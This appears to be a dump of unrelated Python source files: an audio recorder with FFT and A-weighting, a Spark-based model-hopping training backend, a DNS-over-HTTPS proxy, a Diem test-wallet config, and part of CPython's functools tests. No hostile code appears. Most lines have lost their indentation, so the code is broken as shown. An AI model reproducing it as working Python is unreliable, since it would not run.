self.samplesToRecord=int(self.BUFFERSIZE*self.buffersToRecord)
self.chunksToRecord=int(self.samplesToRecord/self.BUFFERSIZE)
self.secPerPoint=1.0/self.RATE
self.p = pyaudio.PyAudio()
self.inStream = self.p.open(format=pyaudio.paFloat32,channels=1,rate=self.RATE,input=True,frames_per_buffer=self.BUFFERSIZE)
self.xsBuffer=numpy.arange(self.BUFFERSIZE)*self.secPerPoint
self.xs=numpy.arange(self.chunksToRecord*self.BUFFERSIZE)*self.secPerPoint
self.audio=numpy.empty((self.chunksToRecord*self.BUFFERSIZE),dtype=numpy.float32)
def close(self):
"""cleanly back out and release sound card."""
self.p.close(self.inStream)
### RECORDING AUDIO ###
def getAudio(self):
"""get a single buffer size worth of audio."""
audioString=self.inStream.read(self.BUFFERSIZE)
        return numpy.frombuffer(audioString, dtype=numpy.float32)
def record(self,forever=True):
"""record secToRecord seconds of audio."""
while True:
if self.threadsDieNow: break
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
self.newAudio=True
if forever==False: break
def getRecord(self):
"""record secToRecord seconds of audio."""
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
rec=self.audio
return rec
def continuousStart(self):
"""CALL THIS to start running forever."""
self.t = threading.Thread(target=self.record)
self.t.start()
def continuousEnd(self):
"""shut down continuous recording."""
self.threadsDieNow=True
### MATH ###
def downsample(self,data,mult):
"""Given 1D data, return the binned average."""
overhang=len(data)%mult
if overhang: data=data[:-overhang]
        data=numpy.reshape(data,(len(data)//mult,mult))
data=numpy.average(data,1)
return data
def fft(self,data=None):
        if data is None:
data=self.audio.flatten()
left,right=numpy.split(numpy.abs(numpy.fft.fft(data)),2)
ys=numpy.add(left,right[::-1])
# Determine FFT frequencies.
xs = (1.*self.RATE/len(ys))*numpy.arange(0,len(ys))
return xs,ys
def level(self,data=None):
        if data is None:
data=self.audio.flatten()
# Calculate magnitude of FFT.
X = numpy.abs(numpy.fft.fft(data))
# Add offset to prevent taking the log of zero.
X[X == 0] = 1e-17
# Retain frequencies below Nyquist rate.
f = (1.*self.RATE/len(X))*numpy.arange(0,len(X))
        ind = f < self.RATE/2.
        f = f[ind]
        X = X[ind]
# Apply A-weighting filter.
A = self.filterA(f)
X = A*X
# Estimate dBA value using Parseval's relation.
totalEnergy = numpy.sum(X**2)/len(X)
meanEnergy = totalEnergy/((1./self.RATE)*len(X))
dBA = 10.*numpy.log10(meanEnergy)+self.C
# Estimate decibel level (for visualization).
X = 20.*numpy.log10(numpy.abs(X))
return f, X, dBA
def filterA(self,f):
# FILTERA Generates an A-weighting filter.
# FILTERA Uses a closed-form expression to generate
# an A-weighting filter for arbitary frequencies.
#
# Author: Douglas R. Lanman, 11/21/05
# Define filter coefficients.
# See: http://www.beis.de/Elektronik/AudioMeasure/
# WeightingFilters.html#A-Weighting
c1 = 3.5041384e16
c2 = 20.598997**2
c3 = 107.65265**2
c4 = 737.86223**2
c5 = 12194.217**2
# Evaluate A-weighting filter.
f[f == 0] = 1e-17;
f = f**2
num = c1*f**4
den = ((c2+f)**2)*(c3+f)*(c4+f)*((c5+f)**2)
A = num/den
return A
### VISUALIZATION ###
def plotAudio(self):
"""open a matplotlib popup window showing audio data."""
pylab.plot(self.audio.flatten())
pylab.show()
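# Hedged usage sketch (module-level helper, never executed on import): grab one
# secToRecord-long recording from the default input device, compute its folded
# spectrum and A-weighted level with the methods above, then release the card.
def _example_capture_and_analyze():
    recorder = SwhRecorder()
    recorder.setup()
    audio = recorder.getRecord()       # one block of secToRecord seconds
    xs, ys = recorder.fft(audio)       # frequency axis and folded magnitude spectrum
    f, X, dBA = recorder.level(audio)  # A-weighted spectrum and dBA estimate
    recorder.close()
    return xs, ys, dBA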
|
backend.py
|
# Copyright 2020 Supun Nakandala, Yuhao Zhang, and Arun Kumar. All Rights Reserved.
# Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
import io
import math
import os
import threading
import time
import gc
import inspect
import datetime
import h5py
import numpy as np
import pyspark
import tensorflow as tf
from six.moves import queue
from . import service_driver, service_task, util
from .. import constants
from .. import timeout, settings as spark_settings, secret, host_hash, job_id
from ..backend import Backend
from ...commons.util import patch_hugginface_layer_methods
from ...commons.constants import exit_event
PETASTORM_HDFS_DRIVER = constants.PETASTORM_HDFS_DRIVER
TOTAL_BUFFER_MEMORY_CAP_GIB = constants.TOTAL_BUFFER_MEMORY_CAP_GIB
BYTES_PER_GIB = constants.BYTES_PER_GIB
def default_num_workers():
spark_context = pyspark.SparkContext._active_spark_context
return spark_context.defaultParallelism
class KerasStepCounter(tf.keras.callbacks.Callback):
"""Helper callback to count the number of step in sub-epoch training"""
def __init__(self):
self.counter = 0
def on_train_batch_begin(self, batch, logs={}):
self.counter += 1
def on_test_batch_begin(self, batch, logs={}):
self.counter += 1
def get_step_count(self):
return self.counter
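# KerasStepCounter is attached to the Keras fit/evaluate callback list inside
# sub_epoch_trainer() below, so that each model's sub-epoch metrics can later be
# averaged weighted by the number of steps that sub-epoch actually ran
# (see the aggregation at the end of train_for_one_epoch()).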
class SparkBackend(Backend):
"""Spark backend implementing Cerebro model hopping
:param spark_context: Spark context
:param num_workers: Number of Cerebro workers. Defaults to `spark.default.parallelism`.
    :param start_timeout: Timeout for Spark tasks to spawn, register and start running the code, in seconds.
                          If not set, defaults to 600 seconds.
:param disk_cache_size_gb: Size of the disk data cache in GBs (default 10GB).
:param data_readers_pool_type: Data readers pool type ('process' or 'thread') (default 'thread')
:param num_data_readers: Number of data readers (default 10)
:param nics: List of NIC names, will only use these for communications. If None is specified, use any
available networking interfaces (default None)
:param verbose: Debug output verbosity (0-2). Defaults to 1.
"""
def __init__(self, spark_context=None, num_workers=None, start_timeout=600, disk_cache_size_gb=10,
data_readers_pool_type='thread', num_data_readers=10,
nics=None, verbose=1):
tmout = timeout.Timeout(start_timeout,
message='Timed out waiting for {activity}. Please check that you have '
'enough resources to run all Cerebro processes. Each Cerebro '
'process runs in a Spark task. You may need to increase the '
'start_timeout parameter to a larger value if your Spark resources '
'are allocated on-demand.')
settings = spark_settings.Settings(verbose=verbose,
key=secret.make_secret_key(),
timeout=tmout,
disk_cache_size_bytes=disk_cache_size_gb * constants.BYTES_PER_GIB,
data_readers_pool_type=data_readers_pool_type,
num_data_readers=num_data_readers,
nics=nics)
if spark_context is None:
spark_context = pyspark.SparkContext._active_spark_context
if spark_context is None:
raise Exception('Could not find an active SparkContext, are you '
'running in a PySpark session?')
self.spark_context = spark_context
if num_workers is None:
num_workers = spark_context.defaultParallelism
if settings.verbose >= 1:
print('CEREBRO => Time: {}, Running {} Workers (inferred from spark.default.parallelism)'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), num_workers))
else:
if settings.verbose >= 1:
print('CEREBRO => Time: {}, Running {} Workers'.format(datetime.datetime.now().strftime(
"%Y-%m-%d %H:%M:%S"), num_workers))
settings.num_workers = num_workers
self.settings = settings
self.workers_initialized = False
self.task_clients = None
self.driver = None
self.driver_client = None
self.spark_job_group = None
self.data_loaders_initialized = False
self.rand = np.random.RandomState(constants.RANDOM_SEED)
def initialize_workers(self):
"""Initializes Cerebro workers"""
result_queue = queue.Queue(1)
spark_job_group = 'cerebro.spark.run.%d' % job_id.next_job_id()
driver = service_driver.SparkDriverService(self.settings.num_workers, self.settings.key, self.settings.nics)
driver_client = service_driver.SparkDriverClient(driver.addresses(), self.settings.key, self.settings.verbose)
_make_spark_thread(self.spark_context, spark_job_group, driver, result_queue, self.settings)
driver.wait_for_initial_registration(self.settings.timeout)
if self.settings.verbose >= 2:
print('CEREBRO => Time: {}, Initial Spark task registration is complete'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
task_clients = [service_task.SparkTaskClient(index,
driver.task_addresses_for_driver(index),
self.settings.key, self.settings.verbose) for index in
range(self.settings.num_workers)]
for task_client in task_clients:
task_client.notify_initial_registration_complete()
# setting local index for each task on the corresponding worker for GPU pinning (if needed)
host_hashes = driver.task_host_hash_indices()
for host_hash in host_hashes:
for i, task_index in enumerate(host_hashes[host_hash]):
task_clients[task_index].set_local_task_index(i)
self.driver = driver
self.driver_client = driver_client
self.task_clients = task_clients
self.spark_job_group = spark_job_group
self.workers_initialized = True
def initialize_data_loaders(self, store, schema_fields):
"""
:param store:
:param dataset_idx:
:param schema_fields:
"""
if self.workers_initialized:
remote_store = store.to_remote(self.spark_job_group, None)
shard_count = self._num_workers()
_, _, _, avg_row_size = util.get_simple_meta_from_parquet(store, schema_fields, None)
data_readers_fn = _data_readers_fn(remote_store, shard_count, schema_fields, avg_row_size,
self.settings.disk_cache_size_bytes,
self.settings.data_readers_pool_type, self.settings.num_data_readers)
for task_client in self.task_clients:
task_client.initialize_data_loaders(store.prefix_path, data_readers_fn)
            self.data_loaders_initialized = True
else:
raise Exception('Spark tasks not initialized for Cerebro. Please run SparkBackend.initialize_workers() '
'first!')
def train_for_one_epoch(self, models, store, feature_cols, label_cols, is_train=True):
mode = "Training"
if not is_train:
mode = "Validation"
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Starting EPOCH {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), mode))
sub_epoch_trainers = []
for model in models:
if type(store) == dict:
a_store = store[model.getRunId()]
else:
a_store = store
if type(feature_cols) == dict:
a_feature_col = feature_cols[model.getRunId()]
else:
a_feature_col = feature_cols
if type(label_cols) == dict:
a_label_col = label_cols[model.getRunId()]
else:
a_label_col = label_cols
sub_epoch_trainers.append(_get_remote_trainer(model, self, a_store, None, a_feature_col, a_label_col, is_train, self.settings.verbose))
model_worker_pairs = [(i, j) for i in range(len(models)) for j in range(self._num_workers())]
# take a random ordering
self.rand.shuffle(model_worker_pairs)
model_states = {i: False for i in range(len(models))}
worker_states = {i: False for i in range(self._num_workers())}
model_on_worker = [-1 for _ in range(self._num_workers())]
model_results = {model.getRunId(): None for model in models}
model_sub_epoch_steps = {model.getRunId(): None for model in models}
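        # Model-hopping scheduler: keep assigning any idle model to any idle worker
        # until every (model, worker) pair in the shuffled list has completed one
        # sub-epoch on that worker.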
while not exit_event.is_set() and len(model_worker_pairs) > 0:
for w in range(self._num_workers()):
# worker idle
if not worker_states[w]:
m = _get_runnable_model(w, model_worker_pairs, model_states, is_train)
if m != -1:
# runnable model found
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Scheduling Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
if type(store) == dict:
a_store = store[models[m].getRunId()]
else:
a_store = store
self.task_clients[w].execute_sub_epoch(
fn=sub_epoch_trainers[m], store_prefix_path=a_store.prefix_path, train=is_train, initial_epoch=models[m].getEpochs())
model_states[m] = True
worker_states[w] = True
model_on_worker[w] = m
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Scheduled Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
else:
m = model_on_worker[w]
if m != -1:
status = self.task_clients[w].sub_epoch_completed()
if status.flag:
# sub-epoch completed
model_worker_pairs.remove((m, w))
model_states[m] = False
worker_states[w] = False
model_on_worker[w] = -1
if status.sub_epoch_result['status'] == 'FAILED':
# Application Error
self.teardown_workers()
raise Exception(status.sub_epoch_result['error'])
else:
res, steps = status.sub_epoch_result['result']
run_id = models[m].getRunId()
if model_results[run_id] is None:
model_results[run_id] = res
model_sub_epoch_steps[run_id] = [steps]
else:
for k in model_results[run_id]:
model_results[run_id][k].append(res[k][0])
model_sub_epoch_steps[run_id].append(steps)
if self.settings.verbose >= 1:
print('CEREBRO => Time: {}, Completed Model: {}, on Worker: {}'.format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), models[m].getRunId(), w))
exit_event.wait(self.settings.polling_period)
# incrementing the model epoch number
if is_train:
for model in models:
model.setEpochs(model.getEpochs() + 1)
# aggregating the model metrics
for run_id in model_results:
res = model_results[run_id]
steps = model_sub_epoch_steps[run_id]
for k in res:
res[k] = (np.sum([rk * steps[i] for i, rk in enumerate(res[k])]) / np.sum(steps))
if self.settings.verbose >= 2:
print('CEREBRO => Time: {}, Completed EPOCH {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), mode))
return model_results
def teardown_workers(self):
"""Teardown Spark tasks"""
for task_client in self.task_clients:
task_client.notify_workload_complete()
self.workers_initialized = False
self.data_loaders_initialized = False
def get_metadata_from_parquet(self, store, label_columns=['label'], feature_columns=['features']):
"""
Get metadata from the data in the persistent storage.
:param store:
:param label_columns:
:param feature_columns:
:return:
"""
return util.get_simple_meta_from_parquet(store, label_columns + feature_columns)
def prepare_data(self, store, dataset, validation, num_partitions=None, parquet_row_group_size_mb=8, dataset_idx=None):
"""
Prepare data by writing out into persistent storage
:param store: Cerebro storage object (e.g., LocalStorage, HDFSStorage).
:param dataset: Spark DataFrame.
:param validation: Fraction of validation data (e.g., 0.25) or name of the DataFrame column indicating validation.
:param num_partitions: Number of data partitions of the output. If None, will default to the current number of
input dataset partitions.
:param parquet_row_group_size_mb: Parquet row group size in MBs (default 8 MB) .
:param dataset_idx: Dataset index if storing multiple datasets in the same directory.
"""
return util.prepare_data(self._num_workers(), store, dataset, validation,
num_partitions=num_partitions, dataset_idx=dataset_idx,
compress_sparse = False,
parquet_row_group_size_mb=parquet_row_group_size_mb, verbose=self.settings.verbose)
def _num_workers(self):
"""
Get number of processes/tasks
:return:
"""
return self.settings.num_workers
def _get_runnable_model(worker, model_worker_pairs, model_states, is_train):
for m, w in model_worker_pairs:
# worker matches and model idle
if is_train:
if w == worker and not model_states[m]:
return m
else:
if w == worker:
return m
return -1
def _get_remote_trainer(estimator, backend, store, dataset_idx, feature_columns, label_columns, is_train=False, verbose=0):
run_id = estimator.getRunId()
if verbose >= 2:
print('CEREBRO => Time: {}, Collecting data metadata for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
train_rows, val_rows, metadata, avg_row_size = \
util.get_simple_meta_from_parquet(store,
schema_cols=label_columns + feature_columns,
dataset_idx=dataset_idx)
estimator._check_params(metadata)
keras_utils = estimator._get_keras_utils()
# Checkpointing the model if it does not exist.
if not estimator._has_checkpoint(run_id):
remote_store = store.to_remote(run_id, dataset_idx)
if verbose >= 2:
print('CEREBRO => Time: {}, Checkpointing artifacts for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
with remote_store.get_local_output_dir() as run_output_dir:
model = estimator._compile_model(keras_utils)
ckpt_file = os.path.join(run_output_dir, remote_store.checkpoint_filename)
model.save(ckpt_file)
remote_store.sync(run_output_dir)
if verbose >= 2:
print('CEREBRO => Time: {}, Initializing sub-epoch trainer for Model: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), run_id))
trainer = sub_epoch_trainer(estimator, metadata, keras_utils, run_id, dataset_idx,
train_rows, val_rows, backend._num_workers())
return trainer
def _data_readers_fn(remote_store, shard_count, schema_fields, avg_row_size, cache_size_limit, pool_type, num_readers):
def _data_readers(index):
from petastorm import make_reader
PETASTORM_HDFS_DRIVER = constants.PETASTORM_HDFS_DRIVER
train_reader = make_reader(remote_store.train_data_path, shuffle_row_groups=False, num_epochs=1,
cur_shard=index,
shard_count=shard_count,
hdfs_driver=PETASTORM_HDFS_DRIVER,
schema_fields=schema_fields,
reader_pool_type=pool_type, workers_count=num_readers,
cache_type='local-disk',
cache_size_limit=cache_size_limit,
cache_row_size_estimate=avg_row_size,
cache_extra_settings={'cleanup': True})
if remote_store.val_data_path != '' and remote_store.val_data_path is not None:
val_reader = make_reader(remote_store.val_data_path, shuffle_row_groups=False, num_epochs=1,
cur_shard=index,
shard_count=shard_count,
hdfs_driver=PETASTORM_HDFS_DRIVER,
schema_fields=schema_fields,
reader_pool_type=pool_type, workers_count=num_readers,
cache_type='local-disk',
cache_size_limit=cache_size_limit,
cache_row_size_estimate=avg_row_size,
cache_extra_settings={'cleanup': True})
else:
val_reader = None
return train_reader, val_reader
return _data_readers
def _make_spark_thread(spark_context, spark_job_group, driver, result_queue,
settings):
"""Creates `settings.num_workers` Spark tasks in a parallel thread."""
def run_spark():
"""Creates `settings.num_workers` Spark tasks, each executing `_task_fn` and waits for them to terminate."""
try:
spark_context.setJobGroup(spark_job_group,
"Cerebro Spark Run",
interruptOnCancel=True)
procs = spark_context.range(0, end=settings.num_workers, numSlices=settings.num_workers)
# We assume that folks caring about security will enable Spark RPC
# encryption, thus ensuring that key that is passed here remains
# secret.
result = procs.barrier().mapPartitions(_make_mapper(driver.addresses(), settings)).collect()
result_queue.put(result)
except:
driver.notify_spark_job_failed()
raise
spark_thread = threading.Thread(target=run_spark)
spark_thread.start()
return spark_thread
def _make_mapper(driver_addresses, settings):
def _mapper(p):
try:
            # Disable HDF5 file locking to avoid "resource temporarily unavailable"
            # errors when Keras saves a model on a shared filesystem.
            import os
            os.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'
index = int(sum(p))
task = service_task.SparkTaskService(index, settings.key, settings.nics)
driver_client = service_driver.SparkDriverClient(driver_addresses, settings.key, settings.verbose)
driver_client.register_task(index, task.addresses(), host_hash.host_hash())
task.wait_for_initial_registration(settings.timeout)
task.wait_for_workload_completion()
yield 0
finally:
task.shutdown()
return _mapper
def sub_epoch_trainer(estimator, metadata, keras_utils, run_id, dataset_idx, train_rows, val_rows,
num_workers):
# Estimator parameters
label_columns = estimator.getLabelCols()
feature_columns = estimator.getFeatureCols()
user_callbacks = estimator.getCallbacks()
batch_size = estimator.getBatchSize()
custom_objects = estimator.getCustomObjects()
metrics_names = [name.__name__ if callable(name) else name for name in estimator.getMetrics()]
user_verbose = estimator.getVerbose()
# Model parameters
input_shapes, output_shapes = estimator.get_model_shapes()
output_names = estimator.getModel().output_names
input_names = estimator.getModel().input_names
floatx = tf.keras.backend.floatx()
make_dataset = keras_utils.make_dataset_fn(
feature_columns, label_columns, metadata,
input_shapes, output_shapes, input_names, output_names, batch_size)
fit_sub_epoch_fn = keras_utils.fit_sub_epoch_fn()
eval_sub_epoch_fn = keras_utils.eval_sub_epoch_fn()
transformation_fn = estimator.getTransformationFn()
# Utility functions
deserialize_keras_model = _deserialize_keras_model_fn()
pin_gpu = _pin_gpu_fn()
# Storage
store = estimator.getStore()
remote_store = store.to_remote(run_id, dataset_idx)
def train(data_reader, is_train, starting_epoch, local_task_index=0):
begin_time = time.time()
# Workaround for the issue with huggingface layers needing a python
# object as config (not a dict) and explicit definition of get_config method.
# We monkey patch the __init__ method get_config methods of such layers.
for k in custom_objects:
if issubclass(custom_objects[k], tf.keras.layers.Layer) and inspect.getmodule(custom_objects[k]).__name__.startswith('transformers.'):
patch_hugginface_layer_methods(custom_objects[k])
tf.keras.backend.set_floatx(floatx)
pin_gpu(local_task_index)
# Verbose mode 1 will print a progress bar.
verbose = user_verbose
with remote_store.get_local_output_dir() as run_output_dir:
step_counter_callback = KerasStepCounter()
callbacks = [step_counter_callback]
callbacks = callbacks + user_callbacks
ckpt_file = os.path.join(run_output_dir, remote_store.checkpoint_filename)
            # restoring the model from the previous checkpoint
with tf.keras.utils.custom_object_scope(custom_objects):
model = deserialize_keras_model(
remote_store.get_last_checkpoint(), lambda x: tf.keras.models.load_model(x))
schema_fields = feature_columns + label_columns
if is_train:
train_data = make_dataset(data_reader, transformation_fn)
initialization_time = time.time() - begin_time
begin_time = time.time()
result = fit_sub_epoch_fn(starting_epoch, model, train_data, callbacks, verbose).history
training_time = time.time() - begin_time
begin_time = time.time()
result = {'train_' + name: result[name] for name in result}
model.save(ckpt_file)
else:
val_data = make_dataset(data_reader, transformation_fn)
initialization_time = time.time() - begin_time
begin_time = time.time()
result = eval_sub_epoch_fn(starting_epoch, model, val_data, callbacks, verbose)
training_time = time.time() - begin_time
begin_time = time.time()
result = [[x] for x in result]
result = {k: v for k, v in zip(['val_loss'] + ['val_' + name for name in metrics_names], result)}
del model
gc.collect()
tf.keras.backend.clear_session()
tf.compat.v1.reset_default_graph()
remote_store.sync(run_output_dir)
finalization_time = time.time() - begin_time
if verbose >= 1:
print('CEREBRO => Time: {}, Model: {}, Mode: {}, Initialization Time: {}, Training Time: {}, '
'Finalization Time: {}'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
run_id, 'TRAIN' if is_train else 'VALID', initialization_time, training_time, finalization_time))
data_reader.reset()
return result, step_counter_callback.get_step_count()
return train
def _deserialize_keras_model_fn():
def deserialize_keras_model(model_bytes, load_model_fn):
"""Deserialize model from byte array encoded in base 64."""
bio = io.BytesIO(model_bytes)
with h5py.File(bio, 'r') as f:
return load_model_fn(f)
return deserialize_keras_model
def _pin_gpu_fn():
def fn(local_task_index):
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
if gpus:
tf.config.experimental.set_visible_devices(gpus[local_task_index], 'GPU')
return fn
def _pin_cpu_fn():
def fn():
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
tf.config.threading.set_inter_op_parallelism_threads(1)
tf.config.threading.set_intra_op_parallelism_threads(1)
return fn
|
doh-threadpool2.py
|
#!/usr/bin/env python3
import socket
import threading, queue
import requests, random
host = '127.0.0.1'
port = 5053
headers = {'accept': 'application/dns-message', 'content-type': 'application/dns-message'}
upstreams = ['https://1.1.1.1/dns-query', 'https://1.0.0.1/dns-query']
conns = []
request_queue = queue.Queue()
sock_lock = threading.Lock()
workers = 4
def main():
# Setup UDP server
print('Starting UDP server listening on: %s#%d' % (host, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((host, port))
# Connect to upstream servers
for upstream in upstreams:
print('Connecting to upstream server: %s' % (upstream))
conns.append(upstream_connect())
# Serve forever
try:
# Sub threads are responsible for forwarding requests
for _ in range(workers):
threading.Thread(target=worker, args=(sock,), daemon=True).start()
# Main thread is responsible for accepting requests
while True:
# Accept requests from a client
data, addr = sock.recvfrom(4096)
# Add request to queue
            request_queue.put((data, addr))
except (KeyboardInterrupt, SystemExit):
pass
# Close upstream connections
for conn in conns:
upstream_close(conn)
# Close UDP server
sock.close()
def worker(sock):
while True:
# Retrieve request from the queue
        data, addr = request_queue.get()
        # Select upstream server to forward to
        index = random.randrange(len(upstreams))
        # Forward request to upstream server and get response
        data = upstream_forward(upstreams[index], data, conns[index])
        # Send response to client
        with sock_lock:
            sock.sendto(data, addr)
        # Mark the request as handled
        request_queue.task_done()
def upstream_connect():
"""
Create an upstream connection that will later be bound to a url.
Returns:
A requests session object
"""
# Create connection with default DNS message headers
session = requests.Session()
session.headers = headers
return session
def upstream_forward(url, data, conn):
"""
Send a DNS request over HTTPS using POST method.
Params:
url - url to forward queries to
data - normal DNS packet data to forward
conn - HTTPS connection to upstream DNS server
Returns:
A normal DNS response packet from upstream server
Notes:
Using DNS over HTTPS POST format as described here:
https://tools.ietf.org/html/draft-ietf-doh-dns-over-https-12
https://developers.cloudflare.com/1.1.1.1/dns-over-https/wireformat/
"""
return conn.post(url, data).content
def upstream_close(conn):
"""
Close an upstream connection.
Params:
conn - requests session object to close
"""
conn.close()
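# Hedged example (not wired into main): issue a single DoH query by hand with the
# helpers above. The raw `dns_query` bytes would normally come straight from the
# UDP socket; here the payload is left to the caller.
def _example_single_query(dns_query):
    conn = upstream_connect()
    try:
        return upstream_forward(upstreams[0], dns_query, conn)
    finally:
        upstream_close(conn)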
if __name__ == '__main__':
main()
|
config.py
|
# Copyright (c) The Diem Core Contributors
# SPDX-License-Identifier: Apache-2.0
from dataclasses import dataclass, field, asdict
from typing import Dict, Any, List, Tuple
from .client import RestClient
from .app import App, falcon_api
from .. import LocalAccount
from ... import offchain, testnet, jsonrpc, utils
import waitress, threading, logging, falcon, json
@dataclass
class ServerConfig:
host: str = field(default="localhost")
port: int = field(default_factory=offchain.http_server.get_available_port)
base_url: str = field(default="")
def __post_init__(self) -> None:
if not self.base_url:
self.base_url = f"http://localhost:{self.port}"
@dataclass
class AppConfig:
name: str = field(default="mini-wallet")
disable_events_api: bool = field(default=False)
account_config: Dict[str, Any] = field(default_factory=lambda: LocalAccount().to_dict())
child_account_configs: List[Dict[str, Any]] = field(default_factory=list)
server_conf: ServerConfig = field(default_factory=ServerConfig)
initial_amount: int = field(default=3_000_000_000_000)
initial_currency: str = field(default=testnet.TEST_CURRENCY_CODE)
child_account_size: int = field(default=2)
@property
def logger(self) -> logging.Logger:
return logging.getLogger(self.name)
@property
def account(self) -> LocalAccount:
return LocalAccount.from_dict(self.account_config)
@property
def child_accounts(self) -> List[LocalAccount]:
return list(map(LocalAccount.from_dict, self.child_account_configs))
@property
def server_url(self) -> str:
return self.server_conf.base_url
def create_client(self) -> RestClient:
self.logger.info("Creating client pointing to %s", self.server_url)
return RestClient(server_url=self.server_url, name="%s-client" % self.name).with_retry()
def setup_account(self, client: jsonrpc.Client) -> None:
self.logger.info("faucet: mint %s", self.account.account_address.to_hex())
faucet = testnet.Faucet(client)
faucet.mint(self.account.auth_key.hex(), self.initial_amount, self.initial_currency)
self.logger.info("rotate dual attestation info for %s", self.account.account_address.to_hex())
self.logger.info("set base url to: %s", self.server_url)
self.account.rotate_dual_attestation_info(client, self.server_url)
self.logger.info("generate child VASP accounts: %s", self.child_account_size)
child_account_initial_amount = int(self.initial_amount / (self.child_account_size + 1))
for i in range(self.child_account_size):
child = self.account.gen_child_vasp(client, child_account_initial_amount, self.initial_currency)
self.logger.info("generate child VASP account(%s): %s", i, child.to_dict())
self.child_account_configs.append(child.to_dict())
def serve(self, client: jsonrpc.Client, app: App) -> threading.Thread:
api: falcon.API = falcon_api(app, self.disable_events_api)
def serve() -> None:
self.logger.info("serving on %s:%s at %s", self.server_conf.host, self.server_conf.port, self.server_url)
waitress.serve(
api,
host=self.server_conf.host,
port=self.server_conf.port,
clear_untrusted_proxy_headers=True,
_quiet=True,
)
t = threading.Thread(target=serve, daemon=True)
t.start()
return t
def start(self, client: jsonrpc.Client) -> Tuple[App, threading.Thread]:
self.setup_account(client)
app = App(self.account, self.child_accounts, client, self.name, self.logger)
t = self.serve(client, app)
utils.wait_for_port(self.server_conf.port, host=self.server_conf.host)
return (app, t)
def __str__(self) -> str:
return json.dumps(asdict(self), indent=2)
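# Hedged usage sketch (not executed on import): bring up a mini-wallet app against
# the Diem testnet with the defaults above. `testnet.create_client()` is assumed to
# be available from the surrounding SDK package.
def _example_start_app():
    conf = AppConfig(name="demo-wallet")
    client = testnet.create_client()   # assumed helper returning a jsonrpc.Client
    app, server_thread = conf.start(client)
    return conf.create_client()        # REST client pointed at conf.server_url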
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
